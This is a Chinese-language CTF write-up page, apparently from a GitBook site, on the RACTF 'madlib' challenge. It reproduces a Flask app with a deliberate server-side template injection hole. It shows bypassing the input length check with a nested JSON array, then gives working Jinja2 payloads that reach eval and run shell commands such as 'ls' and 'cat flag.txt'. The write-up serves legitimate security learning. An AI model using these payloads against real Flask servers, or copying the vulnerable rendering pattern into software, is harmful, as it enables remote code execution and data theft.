👹
CTF Writeup
  • README
  • BUUCTF
    • [护网杯 2018]easy_tornado
    • [极客大挑战 2019]BuyFlag
    • [极客大挑战 2019]BabySQL
    • [ZJCTF 2019]NiZhuanSiWei
    • [BJDCTF2020]Easy MD5
    • [极客大挑战 2019]EasySQL
    • [HCTF 2018]admin
    • [极客大挑战 2019]Havefun
    • [极客大挑战 2019]Http
    • [极客大挑战 2019]HardSQL
    • [极客大挑战 2019]Knife
    • [SUCTF 2019]CheckIn
    • [极客大挑战 2019]LoveSQL
    • [极客大挑战 2019]PHP
    • [极客大挑战 2019]Secret File
    • [MRCTF2020]你传你🐎呢
    • [极客大挑战 2019]Upload
    • [网鼎杯 2020 青龙组]AreUSerialz
    • [极客大挑战 2020]Roamphp6-flagshop
    • [强网杯 2019]随便注
    • [ACTF2020 新生赛]BackupFile
    • [ACTF2020 新生赛]Exec
    • [MRCTF2020]Ez_bypass
    • [ACTF2020 新生赛]Include
    • [GXYCTF2019]Ping Ping Ping
    • [GXYCTF2019]BabySQli
    • [HCTF 2018]WarmUp
    • [RoarCTF 2019]Easy Calc
    • [GYCTF2020]Blacklist
    • [SUCTF 2019]EasySQL
    • [CISCN2019 华北赛区 Day2 Web1]Hack World
    • [网鼎杯 2018]Fakebook
  • RACTF
    • notrequired
    • madlib
    • git commit -m whatever
  • ByteCTF2021
    • double sqli
由 GitBook 提供支持
在本页
  • 1、打开页面点击 source 得到源代码
  • 2、填写信息,提交
  • 3. 抓包
  • 4. 分析源代码
  • 5. 测试SSTI
  • 6. 绕过长度判断RCE
  • 7. RCE
  • 8. Get Flag

这有帮助吗?

  1. RACTF

madlib

上一页notrequired下一页git commit -m whatever

最后更新于3年前

这有帮助吗?

1、打开页面点击 source 得到源代码

image-20211009144501145
from flask import Flask, render_template_string, request, send_from_directory

app = Flask(__name__)

@app.route('/')
def index():
    return send_from_directory('html', 'index.html')

@app.route('/madlib', methods=['POST'])
def madlib():
    if len(request.json) == 5:
        verb = request.json.get('verb')
        noun = request.json.get('noun')
        adjective = request.json.get('adjective')
        person = request.json.get('person')
        place = request.json.get('place')
        params = [verb, noun, adjective, person, place]
        if any(len(i) > 21 for i in params):
            return 'your words must not be longer than 21 characters!', 403
        madlib = f'To find out what this is you must {verb} the internet then get to the {noun} system through the visual MAC hard drive and program the open-source but overriding the bus won\'t do anything so you need to parse the online SSD transmitter, then index the neural DHCP card {adjective}.{person} taught me this trick when we met in {place} allowing you to download the knowledge of what this is directly to your brain.'
        return render_template_string(madlib)
    return 'This madlib only takes five words', 403

@app.route('/source')
def show_source():
    return send_from_directory('/app/', 'app.py')

app.run('0.0.0.0', port=1337)

2、填写信息,提交

3. 抓包

4. 分析源代码

根据源代码可以判断出这是一道SSTI题,需要满足以下条件:

  • post提交json数据到 /madlib

  • json长度等于5

  • json数据中的verb、noun、adjective、person、place、params长度不能超过21

5. 测试SSTI

在verb处输入{{3*8}}输出24

6. 绕过长度判断RCE

这一步卡了挺久的,后来想到了:既然是json格式的数据,那么是否可以嵌套array呢?尝试了一下发现果然可以

成功绕过长度限制!

7. RCE

可以把字符串内容写到get参数中,使用request.args.参数名称读取:

POST /madlib?e=__import__('os').popen('ls').read()

{"verb":["{{().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__['__builtins__']['eval'](request.args.e)}}",2],"noun":"456","adjective":"333","person":"444","place":"555"}

8. Get Flag

POST /madlib?e=__import__('os').popen('cat+flag.txt').read()

{"verb":["{{().__class__.__bases__[0].__subclasses__()[64].__init__.__globals__['__builtins__']['eval'](request.args.e)}}",2],"noun":"456","adjective":"333","person":"444","place":"555"}
image-20211009144749015
image-20211009144708006
image-20211009145508446
image-20211009150804297
image-20211009150928117
image-20211009151148965